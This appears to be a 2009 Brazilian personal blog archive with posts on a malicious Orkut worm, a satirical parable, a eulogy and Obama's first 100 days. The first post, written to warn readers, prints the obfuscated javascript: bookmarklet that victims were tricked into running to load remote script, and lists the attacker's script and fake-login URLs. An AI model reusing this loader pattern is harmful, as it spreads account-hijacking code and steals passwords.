domingo, 29 de novembro de 2009

Brechas no novo orkut….

=====

LEIA MAIS AQUI =>

http://www.leonardolima.com.br/blog/javascript/brechas-no-novo-orkut

-----

Brechas no novo Orkut...


novembro 27th, 2009 in Blog • Javascript by Leonardo Lima

Nova do momento para sacanear as pessoas no orkut

Esse script é o que está sendo utilizado para enganar o pessoal, falando que é para transformar o orkut na nova versão, sem precisar do convite.

Mas na verdade ele trabalha usando chamadas AJAX e explorando falhas do Orkut, ele pega lista todos os Friends, manda um scrap, um depoimento, pega a primeira foto do primeiro album e posta um comentário, alem de ir na comunidade criada pelo engraçadinho faz o registro na comunidade, e posta em um dos topicos
e por final redireciona o usuário para uma pagina falsa que serve para capturar senhas

Bem espertinho o cara né… Para se proteger o rapaz fez uma verificação de que página está chamando a página dele, e faz um tratamento para não deixar vazar o script facilmente, se voce chama a url camuflada no script sem ser do orkut, ele dá uma página de manutenção, sorte que existe Firebug!!!

Alguns dados

URL da Comunidade : http://www.orkut.com.br/Main#Community?cmm=96481032
URL Camuflada no Script : http://sn.im/neworkuti
URL do Script : http://zapmu.com.br/orkuttt/
URL Orkut Falso : http://convitesaqui.com/Orkut/

Código que a vitima é induzida a executar =>

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='ht'+'tp://sn'+'.im/neworkuti';void(0)



=====

quinta-feira, 5 de novembro de 2009

A Verdade.

====

Qua, 04 Nov, 06h28

Dr. Alessandro Loiola*/Especial para BR PressPUBLICIDADE


(BR Press) - Era uma vez uma moça muito inteligente chamada Verdade. Toda vez que a Verdade chegava perto das pessoas, elas fugiam. Algumas até diziam preferi-la sempre à sua prima biscateira, a Mentira, comentavam como a Verdade era magnífica e necessária, mas ficar por perto? Não, não.


Então, certa noite, a Verdade sentou-se sozinha e desanimada em uma calçada. E antes que algum passante mais atrevido sugerisse um programa (quem não gosta de apertar, torcer e fornicar com a Verdade?), uma senhora corcundamente idosa aproximou-se.

- Por que você está tão triste? - perguntou Dona Sabedoria.


- Ninguém gosta de mim. - chorou a Verdade.

A velha mediu a Verdade dos pés à cabeça, fez uma pausa e cravou:

- Mas também, olhe para você, veja só o seu estado...! Lastimável!

A bem da verdade, a Verdade não estava lá essas coisas. Talvez por acreditar que apenas sua luz interior fosse suficiente, ela nunca havia se preocupado muito com a parte de fora. O vestido sujo maltrapilho, o penteado dreadlock e aquele perfume estilo Moscas Ardentes, do Bosticário, não eram realmente sedutores.

- Vamos fazer uma coisa? Vou lhe apresentar uma amiga - aconselhou Dona Sabedoria.

- Tenho certeza de que ela poderá lhe dar umas dicas.

E Dona Sabedoria e a Verdade foram até uma casa de massagem gerenciada por uma cafetina chamada Riqueza. A Riqueza era, por assim dizer, o bicho: por mais que ela se escondesse e esquivasse, os homens sempre estavam atrás dela - e algumas vezes por cima e por baixo também. A Riqueza, sem dúvida alguma, sabia das coisas.

- Eu não entendo... - questionou a Verdade, olhando com desdém para a Riqueza.

- Você é fútil, volátil, passa de mão em mão sem criar laços, não cultiva respeito ou sentimentos. Afinal, o que os homens vêem em você?

- O que eles vêem em mim, querida? - disse a Riqueza, colocando o indicador com 3cm de unha postiça vermelha no canto da boca.

- O que eles não vêem em você, eu lhe digo. Mal acabada desse jeito, nem o inquilino do viaduto vai lhe dar uma cantada. Mas eu já sei o que fazer: vou lhe emprestar um vestido meu, que é fatal. Tiro e queda, meu amor. Ele se chama Parábola.

E desde então, a Verdade tem conseguido se aproximar dos homens travestida de Parábola. A parábola não assusta, é engraçadinha e permite que a Verdade dê sua opinião. Entretanto, é só marcar aquela esticada no motel e tudo recomeça: ainda não existe um remédio para evitar o terror na frente da verdade nua e crua. A resposta para isso, nem mesmo a Sabedoria ou a Riqueza parecem ter.

=====

sexta-feira, 6 de março de 2009

Violência no Brasil faz + 1 mártir...


=====

Ontem foi enterrado em Diadema, SP, no

Cemitério Vale da Paz, um amigo meu que foi morto, baleado e vítima de um assalto na porta de sua casa.

Até onde eu sei, além da preciosa vida do Gegê, não levaram nada.

Se é que isso é um consolo...mas vejo a situação como sendo ele um escudo pra família, pois do jeito que os bandidos estão cruéis, sabe-se lá o que poderiam fazer de maldade com as pessoas que estavam na casa...

Infelizmente hoje em dia chegamos a uma situação que todos nós brasileiros conhecemos alguém que foi estúpidamente assassinado.

Vejo Gegê como mais um mártir, um herói, cuja vida tirada protegeu a de outros.

Creio que Deus permitiu que tenha perdido a consciência rapidamente e não tenha sofrido, pois, não fui ao enterro, fiquei sabendo que sua aparência era tranquila, de não ter dor.

Com o coração com tanto amor, do tamanho do mundo, não acredito que conseguiria superar se as vítimas fossem a família e não ele. Creio que aceitou esse fardo de bom grado. Um dia todos nós vamos morrer e creio que ele aceitou ir assim.

Uma pessoa que poderia usar todas as suas limitações físicas como pretexto para não fazer nada da sua vida, mas escolheu viver alegre, ajudando os outros, escolheu ser útil. Ah...e é claro, participando sempre do seu adorado Carnaval da Rosas de Ouro.

Vamos tentar ficar em Paz, procurando cultivar o melhor de nós e doar o melhor de nós pra esse país melhorar e essas tragédias pararem de acontecer.

Um abraço forte !

-----------

- Link do perfil de Gegê no ORKUT => GEORGE (GEGÊ) LISBOA

==============

sexta-feira, 23 de janeiro de 2009

OS 1ºS 100 DIAS....

======

A imprensa agora está o tempo todo falando sobre os 1ºs 100 dias de governo de Barack Obama, sobre o que será o 'fim de namoro' do povo americano e dos povos do mundo com a figura de Obama, etc.


O ano de 2009 mal começou e o mês de janeiro já acabou praticamente e eu já estou toda enrolada com um monte de coisas pra fazer...e olha que aqui temos uma secretária do lar (termo politicamente correto para empregados domésticos, no meu ponto de vista...)....Agora imaginem como deve ser difícil pra uma pessoa com uma responsabilidade enorme sob as costas, como é a do Presidente Obama, e com centenas de milhares de pessoas com uma expectativa enorme em cima das atitudes dele ?


Realmente a quantidade de coisas que são possíveis de se fazer em 100 dias serão somente como uma gota d'água em comparação à um oceano de coisas que precisam ser ajustadas, não vai dar pra fazer quase nada...


Mas em todo reinado os infiéis estão sempre a espreita de uma brecha pra começar a dizer que as coisas não estão dando certo e incitar a revolta das pessoas.


Eu me recuso a dar ouvidos pra essa gente da torcida do 'já perdeu e já afundou' e gostaria de incentivar a todos que conheço a fazer o mesmo enquanto vão fazendo sua parte pra tentar mudar um pouco a realidade ao redor de onde estejam, pois Obama não é mágico e as pessoas teem pressa de viver.


Vamos com CALMA = COM A ALMA.


Devagar, mas em frente.


-----------------------

- FONTE / LINK => ARNALDO JABOR FALA SOBRE A ERA BARACK OBAMA





---------------------

- FONTE LINK => CRISE ECONOMICA E PRIORIDADE ABSOLUTA DOS PRIMEIROS DIAS DE OBAMA


Crise econômica é prioridade absoluta dos 100 primeiros dias de Obama

Da France Presse


WASHINGTON, 15 Jan 2009 (AFP) - Barack Obama, eleito com a bandeira da "mudança" e da "esperança", vai ter de transformar o teste dos primeiros 100 dias de seu mandato de presidente em uma luta contra a recessão na economia americana.

"Iniciamos este novo ano bem no meio de uma crise econômica jamais vista", disse Obama sábado no último pronunciamento através de emissora de rádio antes da posse, num momento em que o ministério do Trabalho anunciava os dados do desemprego de dezembro, com mais de meio milhão de empregos destruídos.

"O plano de retomada econômica deve ser a prioridade absoluta. Sem a perspectiva de uma retomada econômica, ele não poderá fazer mais nada", comentou John Pitney, professor de ciências políticas do Claremont McKenna College (Californie, oeste).

Há várias semanas, o presidente eleito vem se esforçando para convencer o Congresso a votar rapidamente após a posse, em 20 de janeiro, um plano gigantesco de aproximadamente 800 bilhões de dólares em dois anos para relançar a economia.

Sua meta: criar ou salvar nada menos que três ou quatro milhões de empregos, dos quais 90% no setor privado. A equipe de Obama espera criar empregos principalmente no setor de construção e na indústria manufatureira.

Nestes tempos problemáticos, a chegada à Casa Branca de Barack Obama não pôde deixar de ser comparada à de Franklin Roosevelt em 1933, em plena crise econômica. O presidente do "New Deal", amplo plano de retomada pelas grandes obras de infra-estrutura, havia enviado ao Congresso um número recorde de projetos de lei assim que assumiu o poder. Em 100 dias, os parlamentares aprovaram quase tudo o que ele queria.

Mas. segundo Thomas Mann, do grupo de reflexão Brookings Institution, "o conceito de 100 dias não tem grande significado". Segundo ele, o período é muito curto e constitui "apenas um começo".

"O período dos 100 dias permitirá a Obama lançar seu plano, mas ele não verá resultados concretos em pouco tempo", reconheceu John Pitney. Além do gigantesco tamanho do plano de retomada, que não deve reencontrar muita oposição no Congresso, que teve a maioria democrata reforçada na eleição de 4 de novembro, Obama se antecipou pedindo o desbloqueio dos 350 bilhões de dólares restantes do plano de resgate do setor financeiro.
Ele vai tentar usar este montante, a partir das primeiras semanas de sua presidência, para tentar relançar o crédito, principalmente no setor imobiliário. Em política externa, os desafios são também enormes, com a promessa feita durante a campanha de restaurar a imagem dos EUA no mundo, extremamente abalada pelos oito anos da presidência de George W. Bush.

No conflito israelense-palestino, Obama deve acompanhar o resultado das eleições legislativas israelenses de fevereiro em Israel para determinar sua posição. Mas ele vai ter de agir com urgência. No Iraque, a retirada anunciada das tropas americanas e o forte aumento no frente afegão serão os dois assuntos sobre os quais se espera uma ruptura com a política da administração Bush. O campo de Guantánamo Bay será fechado, mas visivelmente não nos primeiros meses, disse Obama, assumindo o risco de decepcionar alguns de seus eleitores.

emp/lm/sd



========